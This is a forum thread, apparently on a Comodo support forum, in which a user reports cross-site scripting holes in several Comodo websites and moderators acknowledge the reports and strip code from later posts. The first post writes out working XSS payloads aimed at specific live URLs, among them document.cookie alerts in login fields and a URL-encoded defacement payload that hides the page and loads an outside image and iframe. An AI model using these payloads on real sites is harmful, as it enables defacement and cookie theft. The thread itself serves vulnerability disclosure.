Comodo website vulnerable to XSS [REPORT]

Report:

"><script>alert("XSS")</script>

http://www.comodo.com/hackerproof/order2.html?term="><script>alert("www.Insecurity.Ro")</script>

XSS Deface : (picture, alerts, music, etc…)

http://www.comodo.com/hackerproof/order2.html?term=%22%3E%3C/title%3E%3Cscript%3Ealert(%22XSS%20Comodo%22)%3C/script%3E%3Cstyle%3Ebody{visibility:hidden;}%20html{background-color:%20Black;}%3C/style%3E'%22%3E%3Cdiv%20style=%22position:%20absolute;left:%20420px;top:%2040px;%E2%80%8B%E2%80%8Bz-index:%2010;visibility:%20visible;%20color:%20White;%20font-size:%2020px;%22%3E%3Cimg%20src=%22http://img257.imageshack.us/img257/3733/77822687.png%22%20style=%22height:%20400px;%20width:%20600px;%22%20alt=%22By%20Sony%22%3E%3Cbr%3Eby%20Sony%3Ciframe%20src%20=http://www.youtube.com/watch?v=_qwBAZ64VYM%22%20width=%220%22%20height=%220%22%20%5C%3E%3C/div%3E

http://jp.comodo.com/buy/index.php?main_page=discount_coupon&action=lookup

<script>alert(document.cookie)</script>

https://secure.instantssl.com/products/login

username :

"><script>alert(document.cookie)</script>

password:

"><script>alert(document.cookie)</script>

(now don’t work)

The Best Regards!

Lady Sony

Hi Lady Sony,

Thanks for reporting, they will investigate ASAP.

Ok

Hello my boys! :-*

Today I was bored and I found a new xss in comodo.com

… removed by admin …

The Best Regards!

Lady Sony

Thanks for reporting, we’ll investigate the issue.

ok

Hi Lady Sony,

Thank you for your heads up. The xss is being fixed as we speak by the web dev team. I’ve removed the code from your post, so we don’t have any issues.

Multumim :slight_smile:

Ok)

More…

Another xss…

http://www.comodo.com/M<code removed by mod>

You can see and fix it.

So…i found error in mysql (This can be used for full hacking) , but…I lost the link.
If I find, then I’ll write only in the PM.

The Best Regards!

Lady Sony

http://www.hackerguardian.com/<code removed by mod>

etc…

A lot of xss…

Hi again,

Thanks for reporting, will notify admins again.
Ronny